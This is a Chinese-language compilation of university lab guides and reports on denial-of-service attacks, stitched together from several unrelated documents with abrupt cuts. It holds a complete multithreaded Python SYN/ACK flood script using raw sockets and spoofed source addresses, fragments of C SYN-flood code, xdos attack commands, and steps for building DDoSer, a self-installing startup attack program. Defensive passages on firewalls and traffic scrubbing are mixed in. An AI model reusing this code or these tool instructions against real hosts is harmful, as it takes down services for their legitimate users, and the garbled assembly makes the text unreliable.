实验指导书-慢速DDOS拒绝服务攻击(学生使用指导书)

实验23 拒绝服务攻击拒绝服务攻击的目的就是让被攻击目标无法正常地工作，从攻击方式的解释看来，目标的连接速度减慢或者完全瘫痪，那么攻击者的目的也就达到了。

而在被攻击的一方看来，当遭到攻击时，系统会出现一些异常的现象。

练习一洪泛攻击【实验目的】●理解带宽攻击原理●理解资源消耗攻击原理●掌握洪泛攻击网络行为特征【实验人数】每组2人【系统环境】Windows【网络环境】企业网络结构【实验工具】Nmap洪泛工具网络协议分析器【实验原理】见《原理篇》实验23｜练习一。

【实验步骤】本练习主机A、B为一组，C、D为一组，E、F为一组。

实验角色说明如下：首先使用“快照X”恢复Windows系统环境。

一．SYN洪水攻击1．捕获洪水数据（1）攻击者单击实验平台工具栏中的“协议分析器”按钮，启动协议分析器。

单击工具栏“定义过滤器”按钮，在弹出的“定义过滤器”窗口中设置如下过滤条件：●在“网络地址”属性页中输入“any<->同组主机IP地址”；●在“协议过滤”属性页中选中“协议树”｜“ETHER”｜“IP”｜“TCP”结点项。

单击“确定“按钮使过滤条件生效。

单击“新建捕获窗口”按钮，点击“选择过滤器”按钮，确定过滤信息。

在新建捕获窗口工具栏中点击“开始捕获数据包”按钮，开始捕获数据包。

2．性能分析（1）靶机启动系统“性能监视器”，监视在遭受到洪水攻击时本机CPU、内存消耗情况，具体操作如下：依次单击“开始”｜“程序”｜“管理工具”｜“性能”。

在监视视图区点击鼠标右键，选择“属性”打开“系统监视器属性”窗口，在“数据”属性页中将“计数器”列表框中的条目删除；单击“添加”按钮，打开“添加计数器”对话框，在“性能对象”中选择“TCPv4”，在“从列表选择计数器”中选中“Segments Received/sec”,单击“添加”按钮，然后“关闭”添加计数器对话框；单击“系统监视器属性”对话框中的“确定”按钮，使策略生效。

实验4：拒绝式服务攻击与防范【实验目的】熟悉SYNflood的攻击原理与过程，及IPv4所存在的固有缺陷。

【实验准备】准备xdos.exe拒绝服务工具。

【注意事项】实验后将DoS黑客软件从机器彻底删除，避免恶意应用影响网络运行。

【实验步骤】一、拒绝式服务攻击拒绝服务攻击的英文意思是Denial of Service，简称DoS。

这种攻击行动使网站服务器充斥大量要求回复的信息，消耗网络带宽或系统资源，导致网络或系统不胜负荷直至瘫痪而停止提供正常的网络服务。

SYN-Flood是当前最常见的一种Dos攻击方式，它利用了TCP协议的缺陷进行攻击用黑客软件xdos.exe对目标计算机进行拒绝服务攻击并运行测试。

（1）计算机a登录到windows 2000，打开sniffer pro,在sniffer pro中配置好捕捉从任意主机发送给本机的ip数据包，并启动捕捉进程。

（2）在计算机B上登录Windows 2000,打开命令提示窗口，运行xdos.exe,命令的格式：‖xdos<目标主机IP>端口号–t 线程数[-s <插入随机IP>’]‖(也可以用―xdos?‖命令查看使用方法)。

输入命令：xdos 192.168.19.42 80 –t 200 –s* 确定即可进行攻击，192.168.19.42 是计算机A的地址。

（3）在A端可以看到电脑的处理速度明显下降，甚至瘫痪死机，在Sniffer Pro的Traffic Map 中看到最大伪造IP的主机请求与A的电脑建立连接。

（4）B停止攻击后，A的电脑恢复快速响应。

打开捕捉的数据包，可以看到有大量伪造IP地址的主机请求与A的电脑连接的数据包，且都是只请求不应答。

以至于A的电脑保持有大量的半开连接。

运行速度下降直至瘫痪死机，拒绝为合法的请求服务。

二、拒绝式服务防范几乎所有的主机平台都有抵御DoS的设置，常见的有以下几种。

(1)关闭不必要的服务。

实验10-拒绝服务攻击与防范贵州大学实验报告学院：计算机科学与技术学院专业：信息安全班级：sizeof(tcpHeader));tcpHeader.th_sum=checksum((USHORT*)szSendBuf,sizeof(psdHeader)+sizeof(tcpHeader));//把伪造好的IP头和 TCP 头放进 buf 准备发送memcpy(szSendBuf, &ipHeader, sizeof(ipHeader));memcpy(szSendBuf+sizeof(ipHeader), &tcpHeader, sizeof(tcpHeader));//发送数据包rect=sendto(sock, szSendBuf, sizeof(ipHeader)+sizeof(tcpHeader), 0, (struct sockaddr*)&addr_in, sizeof(addr_in));if (rect==SOCKET_ERROR){printf("send error!:%x",WSAGetLastError());return false;}elseprintf("send ok!");Sleep(sleeptime); //根据自己网速的快慢确定此值，sleeptime越小发得越快}//endwhile //重新伪造IP的源地址等再次向目标发送closesocket(sock);WSACleanup();return 0;}4.运行代码得到如下可执行文件：5.攻击之前，将一台web服务器的服务端口改为1234，如下：6.访问上面的web服务器如下：7.DoS攻击：8.最后一个参数60，表示每60ms发送一次，回车后：9.每60 ms显示一个send ok！表示发送成功。

DoS攻击之后，访问之前的web服务器，出现如下情况：表明DOS攻击成功！（二）分布式服务（DDoS）攻击与防范C1（攻击者）上安装DDoS客户端程序，C2—C6（傀儡机）上安装DDoS服务器端，C7(被攻击者)上安装启用冰盾DDoS防火墙，C8(被攻击者)上不使用防火墙。

信息安全与管理专业实训报告学生姓名：一、实训名称：拒绝服务攻击-TCP SYN Flood攻击与防御。

二、实训内容1、kali的安装部署2、SYN Flood攻击演示3、观察受攻击目标的系统状态4、防御措施三、实验步骤1、python攻击代码环境：ubuntu/kali +python 2.7.11使用方法如下：mode有三种模式syn攻击、ack攻击、混合攻击，虽说是支持多线程但是多个线程反而不如单线程快，估计是我的多线程弄得有些问题，麻烦这方面比较懂的朋友帮我指点一下。

我电脑是i7-6700单线程也只能这点速度。

cpu1已经使用89%了看一下抓包情况吧，因为只是测试用我也没带tcp的options字段，报文长度也不够64字节，不过也能传到目的地址。

下面是代码：#!/usr/bin/python#-*-coding:utf-8-*-import socketimport structimport randomimport threadingclass myThread (threading.Thread):def __init__(self,dstip,dstport,mode):threading.Thread.__init__(self)self.dstip = dstipself.dstport =dstportself.mode =modedef run(self):attack(self.dstip,self.dstport,self.mode)def checksum(data):s = 0n = len(data) % 2for i in range(0, len(data)-n, 2):s+= ord(data[i]) + (ord(data[i+1]) << 8) if n:s+= ord(data[i+1])while (s >> 16):s = (s & 0xFFFF) + (s >> 16)s = ~s & 0xffffreturn sdef IP(source,destination,udplen):version = 4ihl = 5tos = 0tl = 20+udplenip_id = random.randint(1,65535)flags = 0offset = 0ttl = 128protocol =6check =0source = socket.inet_aton(source)destination = socket.inet_aton(destination)ver_ihl = (version << 4)+ihlflags_offset = (flags << 13)+offsetip_header = struct.pack("!BBHHHBBH4s4s",ver_ihl,tos,tl,ip_id,flags_offset,ttl,protocol,check,source,destination)check=checksum(ip_header)ip_header = struct.pack("!BBHHHBBH4s4s",ver_ihl,tos,tl,ip_id,flags_offset,ttl,protocol,socket.htons(check),source,destination)return ip_headerdef TCP(srcip,dstip,protocol,dp,fg):source = socket.inet_aton(srcip)destination = socket.inet_aton(dstip)srcport=random.randint(1,65535)dstport=dpsyn_num=random.randint(1,4000000000)if fg == 2:ack_num=0else:ack_num=random.randint(1,4000000000) hlen=5zero=0flag=fgwindow=8192check=0point=0tcplen=hlenh_f=(hlen << 12)+flagTCP_head=struct.pack("!4s4sHHHHIIHHHH",source,destination,protocol,tcplen,srcport,dstport,s yn_num,ack_num,h_f,window,check,point)check=checksum(TCP_head)TCP_head=struct.pack("!HHIIHHHH",srcport,dstport,syn_num,ack_num,h_f,window,check,point )return TCP_headdef makepacket(dstip,dstport,fg):srcip=str(random.choice(ip_first))+'.'+str(random.randint(1,255))+'.'+str(random.randint(1,255))+'. '+str(random.randint(1,255))protocol=6ippacket=IP(srcip,dstip,5)+TCP(srcip,dstip,protocol,dstport,fg)return ippacketdef attack(dstip,dstport,mode):if mode == 'syn':fg=2while 1:data=makepacket(dstip,dstport,fg)s.sendto(data,(dstip,dstport))elif mode == 'ack':fg=18while 1:data=makepacket(dstip,dstport,fg)s.sendto(data,(dstip,dstport))elif mode == 'syn&ack':while 1:data=makepacket(dstip,dstport,2)s.sendto(data,(dstip,dstport))data=makepacket(dstip,dstport,18)s.sendto(data,(dstip,dstport))else:print 'DON\'T xia say!'dstip=raw_input('attack IP:')dstport=int(input('attack PORT:'))mode=raw_input('mode:(syn or ack or syn&ack)') threads=int(input("线程数threads："))ip_first=[]for i in range(1,10):ip_first.append(i)for i in range(11,172):ip_first.append(i)for i in range(173,192):ip_first.append(i)for i in range(193,224):ip_first.append(i)s = socket.socket(socket.AF_INET,socket.SOCK_RAW,6) s.setsockopt(socket.IPPROTO_IP,socket.IP_HDRINCL,1)threads_name=[]for i in range(threads):threads_name.append('teread'+str(i))for i in range(threads):threads_name[i]=myThread(dstip,dstport,mode)for i in range(threads):threads_name[i].start()2、C语言攻击代码环境：ubuntu/kali gcc version 6.1.1 20160802 (Debian 6.1.1-11)使用方法：支持两个参数目的ip和目的端口性能：限制发包速度的是带宽（我这是100M的网，除去报文的前导码和帧间隔极限速度差不多就是9m左右了），cpu利用才27%，我在1000Mbps的网速下测试，单线程的话速度能到40m左右，cpu占用率大约85%左右。

校园网络安全应急预案应对DDoS攻击的有效措施一、背景介绍随着互联网的迅速发展，校园网络已经成为学生和教职员工信息交流的主要平台。

然而，校园网络也面临着各种网络安全威胁，其中DDoS攻击是最为常见和具有破坏性的一种攻击方式。

本文将重点探讨校园网络安全应急预案应对DDoS攻击的有效措施。

二、DDoS攻击简介DDoS攻击（分布式拒绝服务攻击）是指黑客利用多台计算机、服务器或者网络设备，通过大量的请求或者垃圾数据包向目标服务器发送流量攻击，致使目标服务器无法正常服务。

DDoS攻击具有隐蔽性、强大的攻击威力和波及面广的特点，给校园网络带来了严重的安全威胁。

三、校园网络安全应急预案针对DDoS攻击，校园网络应急预案可以包含以下有效措施：1.建立网络安全保护体系校园网络应当建立完善的安全保护体系，包括入侵检测系统（IDS）、入侵防御系统（IPS）等设备的部署。

这些设备能够监测和检测网络中的异常流量和攻击行为，并自动采取相应的防御措施。

2.增加网络带宽和设备容量校园网络应当根据实际需求，提前规划和增加网络带宽和设备容量。

在面对DDoS攻击时，合理的带宽和设备资源可以有效分担攻击带来的压力，减轻网络拥塞的影响。

3.分流和隔离攻击流量在发生DDoS攻击时，校园网络可以通过流量分流和隔离来减轻攻击的影响。

将正常流量和攻击流量分别引导到不同的网络节点和服务器，从而保证正常流量的正常传输。

4.使用防火墙技术防火墙技术是校园网络安全的重要保障手段之一。

通过设置防火墙规则，校园网络可以对来自外部的恶意流量进行过滤和阻断，从根本上减少DDoS攻击对网络的影响。

5.实施流量清洗校园网络应当与运营商或者第三方服务商合作，实施流量清洗服务。

该服务可以对流经校园网络的流量进行实时检测和清洗，过滤掉恶意攻击流量，保证正常的网络服务。

6.制定应急响应策略校园网络应当制定详细的应急响应策略，明确各个部门和个人在DDoS攻击发生时的应对措施和责任分工。

华北电力大学
实验报告|
|
实验名称拒绝服务攻击实验
课程名称网络攻击与防范
|
|
专业班级：网络学生姓名：
学号：成绩：
指导教师：曹锦纲实验日期：
3、此时打开百度页面，可以看到能抓到所有发给PC2的ip数据包。

4、在PC1上打开XDos.exe，命令的格式为：xdos <目标主机IP> 端口号 -t 线程数 [-s <插入随机IP>]。

输入命令：xdos 192.168.137.3 80 -t 200 -s*，回车即可攻击，192.168.137.3是PC2的IP地址。

5、在PC2中可以看到大量伪造IP地址的主机请求与PC2的电脑建立连接。

且能通过捕捉到的数据包看到都是只请求不应答，以至于PC2保持有大量的半开连接。

6、停止攻击后，PC2不再接收到数据包。

五、拒绝式服务防范
几乎所有的主机平台都有抵御DoS的设置，常见的有以下几种：
（1）关闭不必要的服务。

（2）限制同时打开的Syn半连接数目。

（3）缩短Syn半连接的time out时间。

（4）及时更新系统补丁.
六、实验心得与体会。

信息安全技术实践作业指导书第1章信息安全基础 (4)1.1 信息安全概念与体系结构 (4)1.1.1 信息安全定义 (4)1.1.2 信息安全体系结构 (4)1.2 常见信息安全威胁与防护措施 (4)1.2.1 常见信息安全威胁 (4)1.2.2 防护措施 (4)第2章密码学基础 (5)2.1 对称加密算法 (5)2.1.1 常见对称加密算法 (5)2.1.2 对称加密算法的应用 (5)2.2 非对称加密算法 (5)2.2.1 常见非对称加密算法 (5)2.2.2 非对称加密算法的应用 (6)2.3 哈希算法与数字签名 (6)2.3.1 哈希算法 (6)2.3.1.1 常见哈希算法 (6)2.3.2 数字签名 (6)2.3.2.1 数字签名的实现过程 (6)2.3.3 数字签名的作用 (6)第3章认证与访问控制 (6)3.1 认证技术 (6)3.1.1 生物认证 (6)3.1.2 密码认证 (7)3.1.3 令牌认证 (7)3.1.4 双因素认证 (7)3.2 访问控制模型 (7)3.2.1 自主访问控制模型 (7)3.2.2 强制访问控制模型 (7)3.2.3 基于角色的访问控制模型 (7)3.2.4 基于属性的访问控制模型 (7)3.3 身份认证与权限管理 (7)3.3.1 身份认证 (7)3.3.2 权限管理 (7)3.3.3 访问控制策略 (8)第4章网络安全协议 (8)4.1 SSL/TLS协议 (8)4.1.1 SSL/TLS协议原理 (8)4.1.2 SSL/TLS协议功能 (8)4.1.3 SSL/TLS协议应用 (8)4.2 IPsec协议 (8)4.2.2 IPsec协议工作原理 (9)4.2.3 IPsec协议应用 (9)4.3 无线网络安全协议 (9)4.3.1 无线网络安全协议原理 (9)4.3.2 无线网络安全协议关键技术 (9)4.3.3 无线网络安全协议应用 (9)第5章网络攻击与防范 (9)5.1 网络扫描与枚举 (9)5.1.1 网络扫描技术 (9)5.1.2 枚举技术 (10)5.2 漏洞利用与攻击方法 (10)5.2.1 漏洞利用概述 (10)5.2.2 攻击方法 (10)5.3 防火墙与入侵检测系统 (11)5.3.1 防火墙技术 (11)5.3.2 入侵检测系统（IDS） (11)第6章恶意代码与防护 (11)6.1 计算机病毒 (11)6.1.1 病毒的定义与特征 (11)6.1.2 病毒的分类 (12)6.1.3 病毒的传播与感染 (12)6.1.4 病毒的防护措施 (12)6.2 木马与后门 (12)6.2.1 木马的定义与特征 (12)6.2.2 木马的分类 (12)6.2.3 木马的传播与感染 (12)6.2.4 木马的防护措施 (12)6.3 蠕虫与僵尸网络 (12)6.3.1 蠕虫的定义与特征 (13)6.3.2 蠕虫的传播与感染 (13)6.3.3 僵尸网络的定义与特征 (13)6.3.4 蠕虫与僵尸网络的防护措施 (13)第7章应用层安全 (13)7.1 Web安全 (13)7.1.1 基本概念 (13)7.1.2 常见Web攻击类型 (13)7.1.3 Web安全防范措施 (13)7.2 数据库安全 (14)7.2.1 数据库安全概述 (14)7.2.2 数据库安全威胁 (14)7.2.3 数据库安全防范措施 (14)7.3 邮件安全与防护 (14)7.3.1 邮件安全概述 (14)7.3.3 邮件安全防护措施 (14)第8章系统安全 (15)8.1 操作系统安全 (15)8.1.1 操作系统安全概述 (15)8.1.2 操作系统安全机制 (15)8.1.3 操作系统安全实践 (15)8.2 安全配置与基线加固 (15)8.2.1 安全配置概述 (15)8.2.2 安全配置实践 (15)8.2.3 基线加固概述 (15)8.2.4 基线加固实践 (15)8.3 虚拟化与云安全 (15)8.3.1 虚拟化安全概述 (16)8.3.2 虚拟化安全实践 (16)8.3.3 云安全概述 (16)8.3.4 云安全实践 (16)第9章物理安全与应急响应 (16)9.1 物理安全设施 (16)9.1.1 安全区域规划 (16)9.1.2 机房设施安全 (16)9.1.3 网络设备安全 (16)9.2 安全审计与监控 (16)9.2.1 安全审计 (16)9.2.2 安全监控 (16)9.2.3 安全审计与监控的协同作用 (17)9.3 应急响应与处理 (17)9.3.1 应急响应计划 (17)9.3.2 应急响应团队 (17)9.3.3 信息安全事件处理 (17)9.3.4 事后总结与改进 (17)第10章信息安全管理体系 (17)10.1 信息安全策略与法律法规 (17)10.1.1 信息安全策略概述 (17)10.1.2 信息安全策略的制定与实施 (17)10.1.3 我国信息安全法律法规体系 (17)10.1.4 企业信息安全法律法规遵循 (17)10.2 信息安全风险评估与管理 (17)10.2.1 信息安全风险评估概述 (18)10.2.2 信息安全风险评估方法 (18)10.2.3 信息安全风险评估流程 (18)10.2.4 信息安全风险管理策略与措施 (18)10.3 信息安全培训与意识提升 (18)10.3.1 信息安全培训的意义与目标 (18)10.3.2 信息安全培训内容与方法 (18)10.3.3 信息安全意识提升策略 (18)10.3.4 信息安全培训的实施与评估 (18)第1章信息安全基础1.1 信息安全概念与体系结构1.1.1 信息安全定义信息安全是指保护信息资产，保证信息的保密性、完整性和可用性，避免由于非法访问、泄露、篡改、破坏等造成的信息丢失、损害和不可用的一系列措施和过程。

网络安全原理与应用系别：计算机科学与技术系班级：网络信息与技术姓名：x x x 学号：xxxxxxxxxxxxx拒绝服务攻击原理、常见方法及防范什么是DOS攻击DOS :即Denial Of Service，拒绝服务的缩写，可不能认为是微软的dos操作系统了。

DOS攻击即攻击者想办法让目标机器停止提供服务或资源访问，这些资源包括磁盘空间、内存、进程甚至网络带宽，从而阻止正常用户的访问。

比如：试图FLOOD服务器，阻止合法的网络通讯*破坏两个机器间的连接，阻止访问服务*阻止特殊用户访问服务*破坏服务器的服务或者导致服务器死机不过，只有那些比较阴险的攻击者才单独使用DOS攻击，破坏服务器。

通常，DOS攻击会被作为一次入侵的一部分，比如，绕过入侵检测系统的时候，通常从用大量的攻击出发，导致入侵检测系统日志过多或者反应迟钝，这样，入侵者就可以在潮水般的攻击中混骗过入侵检测系统。

DoS的攻击方式有很多种，最基本的DoS攻击就是利用合理的服务请求来占用过多的服务资源，从而使合法用户无法得到服务的响应。

DDoS攻击手段是在传统的DoS攻击基础之上产生的一类攻击方式。

单一的DoS攻击一般是采用一对一方式的，当攻击目标CPU速度低、内存小或者网络带宽小等等各项性能指标不高它的效果是明显的。

随着计算机与网络技术的发展，计算机的处理能力迅速增长，内存大大增加，同时也出现了千兆级别的网络，这使得DoS攻击的困难程度加大了-目标对恶意攻击包的”消化能力”加强了不少，例如你的攻击软件每秒钟可以发送3,000个攻击包，但我的主机与网络带宽每秒钟可以处理10,000个攻击包，这样一来攻击就不会产生什么效果。

这时侯分布式的拒绝服务攻击手段（DDoS ）就应运而生了。

你理解了DoS攻击的话，它的原理就很简单。

如果说计算机与网络的处理能力加大了10倍，用一台攻击机来攻击不再能起作用的话，攻击者使用10台攻击机同时攻击呢？用100台呢？DDoS就是利用更多的傀儡机来发起进攻，以比从前更大的规模来进攻受害者。

dos攻击实验报告DOS 攻击实验报告一、实验背景在当今数字化的时代，网络安全成为了至关重要的问题。

分布式拒绝服务（DDoS）攻击作为一种常见的网络攻击手段，对网络服务的可用性和稳定性造成了严重威胁。

为了深入了解 DDoS 攻击的原理和危害，进行本次实验。

二、实验目的本次实验的主要目的是通过模拟 DDoS 攻击，观察其对目标系统的影响，分析攻击的特征和防御的难点，为网络安全防护提供实践经验和理论依据。

三、实验环境（一）攻击端1、操作系统：Windows 102、攻击工具：LOIC（Low Orbit Ion Cannon）（二）目标端1、操作系统：Ubuntu Server 20042、服务：Web 服务器（Apache）（三）网络环境1、局域网，通过路由器连接攻击端和目标端四、实验原理DDoS 攻击是指攻击者通过控制大量的傀儡主机（也称为“肉鸡”）向目标服务器发送大量的请求，导致目标服务器无法处理正常的请求，从而使服务瘫痪。

常见的 DDoS 攻击方式包括 SYN Flood、UDP Flood、ICMP Flood 等。

五、实验步骤（一）准备阶段1、在攻击端安装 LOIC 工具，并配置相关参数，如攻击目标的 IP地址和端口。

2、在目标端安装 Web 服务器，并确保其正常运行，同时安装网络监控工具，如 Wireshark，用于监测网络流量。

（二）攻击阶段1、启动 LOIC 工具，选择攻击模式（如 TCP、UDP 等），并点击“开始攻击”按钮。

2、观察目标端的 Web 服务器性能指标，如 CPU 利用率、内存利用率、网络带宽等，以及网络监控工具中的数据包情况。

（三）停止攻击点击 LOIC 工具中的“停止攻击”按钮，结束攻击。

六、实验结果与分析（一）目标端性能指标变化1、 CPU 利用率：在攻击期间，目标服务器的 CPU 利用率迅速飙升，达到 100%，导致服务器无法及时处理正常请求，响应时间延长。

拒绝服务攻击事件的处理(SEC-W07-003.1)拒绝服务攻击即攻击者想办法让目标机器停止提供服务或资源访问，是黑客常用的攻击手段之一。

这些资源包括磁盘空间、内存、进程甚至网络带宽，从而阻止正常用户的访问。

其实对网络带宽进行的消耗性攻击只是拒绝服务攻击的一小部分，只要能够对目标造成麻烦，使某些服务被暂停甚至主机死机，都属于拒绝服务攻击。

拒绝服务攻击问题也一直得不到合理的解决，究其原因是因为这是由于网络协议本身的安全缺陷造成的，从而拒绝服务攻击也成为了攻击者的终极手法。

实验目的●通过学习使用简单的发包工具模拟发包，检查目标主机的网络情况，了解拒绝服务攻击的一般特征以及相关处理措施。

（本次实验只是拒绝服务攻击的简单模拟，网络实际发生的攻击行为要复杂的多）实验准备●了解拒绝服务攻击，并针对此类攻击事件作出相应处理实验步骤使用udpflood.exe程序发送udp包攻击实验服务器1.获取到本课件的工具压缩把以后，将包解压并运行其中的udpflood.exe文件，如：图1图12.在上图所示的界面中：a) IP/hostname处输入实验服务器的IP地址b) Port出输入445c) Max duration（secs）输入900d) 在speed的位置选择max （LAN）e) 然后点击go开始发包。

如：图2图23.运行远程桌面客户端程序mstsc.exe，输入服务器IP地址，点击Connect连接，如：图3图34.以Administrator（管理员）（口令：1qaz@WSX）身份登陆实验服务器桌面。

5.点击远程桌面右下角的天网防火墙的图标，打开天网防火墙的界面，然后选择日志的标签，如：图4图46.在天网防火墙的日志中可以查看到大量的来自同一个IP（请记下该IP，做后面的规则添加用）的udp包，本机端口是445，并且该包是允许通行的。

如：图5图57.在本机点击udpflood程序界面上的stop，停止发包，但是不要关闭该程序，如：图6图6设置防火墙规则禁止udp包通过1.点击天网防火墙的IP规则管理标签，打开IP规则管理界面，然后点击增加规则图标，如：图7图72.在增加IP规则界面中：a) 名称处输入一个名称，如：deny udpb) 数据包方向：选接受即可c) 对方IP地址处：选择指定地址，然后在ip处填入刚才在日志中看到的ip地址。

4. 检查Server状态。

发动攻击前，为了保证Server的有效，我们最好对它来次握手应答过程，把没用的Server踢出去，点击“检查状态”按钮，Client
列表来次扫描检查，最后会生成一个报告，看：
5. 清理无效主机
点“切换”按钮进入无效主机列表，用“清理主机”按钮把无效的废机踢出去，再按一次“切换”转回主机列表。

7. 攻击
经过前面的检测，我们现在可以发动攻击了。

SYN攻击：源IP乱填（要遵守IP协议），目标IP填你要攻击的IP或域名，源端口0---65535随便一个，目标端口：80--攻击HTTP，21--攻击FTP，23--攻击Telnet，25/110--攻击E-MAIL，8000--攻击腾讯
8. 对方机器的cpu占用率如图所示：
证明攻击成功，但攻击完事之后，一定要记得停止攻击。

实验完毕，关闭虚拟机和所有窗口。

拒绝服务攻击的实现一、实验目的通过联系使用DoS/DDoS攻击工具对目标主机进行攻击；理解DoS/DDoS攻击的原理和实施过程；掌握检测和防范DoS/DDoS攻击的措施。

二、实验内容1、UDP Flood 攻击练习UDP Flood 是一种采用UDP Flood 攻击方式的DoS 软件，它可以向特定的IP地址和端口发送UDP包。

在ip/hostname和Port窗口中制定目标主机的IP地址和端口号；在Max duration 设定最长攻击时间，在Speed窗口中设置UDP包发送的速度，在data中定义数据包中的内容；单击Go就可以对目标主机发起攻击。

如下图所示：2、在192.168.1.1计算机中可以查看收到的UDP数据包，这需要事先对系统监视器进行配置。

打开“性能”对话框，如下图所示，我们在这个窗口中添加对UDP数据包的监视，在性能对象中选择UDP协议，在从列表选择计数器中选择Datagram Received/Sec 即对收到的UDP计数。

2、DDoSer的使用DDoSer是一种DDos的攻击工具，程序运行后自动转如系统，并在以后随系统启动，自动对事先设定好的目标进行攻击。

本软件分为生成器和攻击者程序。

软件下载后是没有DDoS攻击者程序的，需要通过生成器DDoSmaker.exe进行生成。

DDoSer使用的攻击手段是SYN Flood 方式。

如下图所示：设置并生成DDoS攻击者程序：首先运行生成器(DDoSMaker.exe)，会弹出一个对话框，在生成前要先进行必要的设置，其中：“目标主机的域名或IP地址”：就是你要攻击主机的域名或IP地址，这里我们建议使用域名，因为IP地址是经常变换的，而域名是不会变的。

“端口”：就是你要攻击的端口，请注意，这里指的是TCP端口，因为本软件只能攻击基于TCP的服务。

80就是攻击HTTP服务，21就是攻击FTP服务，25就是攻击SMTP服务，110就是攻击POP3服务等等。

如何应对学校网络安全威胁的分布式拒绝服务攻击分布式拒绝服务（DDoS）攻击是一种旨在使网络资源不可用的恶意行为。

它通过同时向目标服务器发送大量请求，使其超负荷运行，从而导致网络服务中断。

对于学校来说，网络服务的可靠性和安全性至关重要，因此，应对DDoS攻击是非常重要的。

本文将介绍一些应对学校网络安全威胁的分布式拒绝服务攻击的方法。

一、网络流量监控与分析要及时发现并应对DDoS攻击，学校应该使用专业的网络流量监控和分析工具。

这些工具可以实时监控网络流量，并作出准确的分析判断，将正常流量与异常流量区分开来。

一旦检测到异常流量，学校网络管理员可以立即采取相应措施来应对威胁。

二、增强网络基础设施的防御能力学校网络基础设施的安全性是防范DDoS攻击的关键。

以下是一些增强网络基础设施的防御能力的方法：1. 配置网络设备：学校应将网络设备配置为最安全的状态，更新设备的固件和软件版本，及时修补已知的漏洞，加强设备的访问控制措施，限制不必要的端口开放，以及强化设备密码和身份验证机制。

2. 防火墙设置：学校需要通过合理设置防火墙规则，对网络流量进行过滤和监控，阻止恶意流量和异常访问，以确保网络服务的稳定和可靠。

3. 负载均衡：通过将网络流量分发到多个服务器上，负载均衡技术可以减轻单一服务器的压力，提高整个网络系统的可靠性和容错能力，从而有效应对DDoS攻击。

三、流量清洗与黑洞路由流量清洗和黑洞路由是常用的应对DDoS攻击的方法。

流量清洗是指将网络流量从恶意流量中过滤出正常的流量，并将其发送到目标服务器。

而黑洞路由是将恶意的连接流量重定向到虚拟“黑洞”，从而消除攻击对网络的影响。

四、使用反向代理和CDN服务学校可以使用反向代理和内容分发网络（CDN）服务来有效应对DDoS攻击。

反向代理服务器可以作为缓冲层，过滤和拦截来自恶意IP 地址的流量，将正常的流量传递给目标服务器。

CDN服务可以将内容分发到全球范围的多个节点，从而分散并处理流量，提供更高的可用性和可伸缩性。

实验慢速DDOS拒绝服务攻击【实验目的】通过对靶机进行模拟慢速DDOS拒绝服务攻击，更加深入地分析和理解慢DDOS拒绝服务攻击的原理和过程。

【实验环境】(1)目标主机：Windows 7操作系统+ JSP/MySQL 环境IP地址为:192.168.13.135(2)攻击机：Windows 7操作系统+ Python 2.7IP地址为:192.168.13.140(3)AWVS 扫描工具(4)Torshammer 1.0 工具【预备知识】（1）了解慢DDOS拒绝服务攻击慢DDOS拒绝服务攻击的出现可能是因为Web服务器的http头部传输的最大许可时间没有进行限制造成的。

它利用的HTTP POST：POST的时候，指定一个非常大的content-length，然后以很低的速度发包，不如10-100s发一个字节，hold住这个连接不断开。

这样当客户端连接多了之后，占用住了Web 服务器的所有可用连接，从而导致HTTP服务器将拒绝其他的请求服务。

（2）了解Torshammer工具Torshammer(Tor’s Hammer)是一个用Python语言编写的能发起缓慢POST DoS攻击的测试工具。

Torshammer也可以运行在tor网络中（此时会假定通过127.0.0.1:9050运行tor）。

通过一台机器，Torshammer就可以kill 掉大多数没有受到保护的Apache和IIS服务器：kill掉Apache 1.X和老版本的IIS,只需要启用~128个线程，kill掉Apache2.X和新版本的IIS，需要启用~256个线程。

可以通过Torshammer直接发起HTTP POST攻击（不支持GET），也可以通过Tor网络发动攻击。

Torshammer的HTTP POST攻击是首先向服务器发送一个POST报文请求，然后再发送一系列随机的字符串（分多个报文发送，每个报文包含两个字符）。

【实验内容】掌握使用Torshammer向目标主机发起慢DDOS拒绝服务攻击的基本步骤及原理。